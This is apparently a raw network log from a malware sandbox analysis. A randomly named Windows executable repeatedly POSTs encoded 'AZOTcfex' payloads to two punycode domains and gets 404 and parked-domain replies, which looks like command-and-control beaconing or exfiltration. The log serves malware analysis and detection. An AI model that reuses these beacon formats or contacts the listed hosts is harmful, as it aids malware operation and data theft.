                Aug 23, 2024 04:19:22.189033031 CEST | 859 | IN | Data Raw: 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22
                Data Ascii: +h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}els
                Aug 23, 2024 04:19:22.189047098 CEST | 1236 | IN | Data Raw: 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64
                Data Ascii: ntScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){
                Aug 23, 2024 04:19:22.189060926 CEST | 224 | IN | Data Raw: 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 70 69 6e 67 22 29 7b
                Data Ascii: arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}el
                Aug 23, 2024 04:19:22.189074993 CEST | 1236 | IN | Data Raw: 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77
                Data Ascii: se{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].s
                Aug 23, 2024 04:19:22.189088106 CEST | 1236 | IN | Data Raw: 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f
                Data Ascii: (g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}
                Aug 23, 2024 04:19:22.189105988 CEST | 1236 | IN | Data Raw: 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d
                Data Ascii: lue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window
                Aug 23, 2024 04:19:22.195242882 CEST | 1236 | IN | Data Raw: 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c
                Data Ascii: w.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.4 | 49746 | 43.252.167.188 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:36.087420940 CEST | 796 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
                Data Ascii: AZOTcfex=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
                Aug 23, 2024 04:19:36.939379930 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:29 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.4 | 49747 | 43.252.167.188 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:38.631367922 CEST | 816 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                Data Ascii: AZOTcfex=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
                Aug 23, 2024 04:19:39.479496956 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:32 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.4 | 49748 | 43.252.167.188 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:41.175853014 CEST | 10898 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c [TRUNCATED]
                Data Ascii: AZOTcfex= [TRUNCATED]
                Aug 23, 2024 04:19:42.069999933 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:34 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                12 | 192.168.2.4 | 49749 | 43.252.167.188 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:43.704086065 CEST | 518 | OUT | GET /rm91/?bB7L5=DPt0-rQpMXpt&AZOTcfex=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--fhq1c541j0zr.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:44.581557989 CEST | 367 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:27:37 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                13 | 192.168.2.4 | 49750 | 194.9.94.85 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:49.766351938 CEST | 796 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                Data Ascii: AZOTcfex=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                Aug 23, 2024 04:19:50.401520967 CEST | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:50 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:50.401580095 CEST | 1236 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:50.401617050 CEST | 1236 | IN | Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:50.401652098 CEST | 1236 | IN | Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 23, 2024 04:19:50.401712894 CEST | 878 | IN | Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                14 | 192.168.2.4 | 49751 | 194.9.94.85 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:52.319443941 CEST | 816 | OUT | POST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
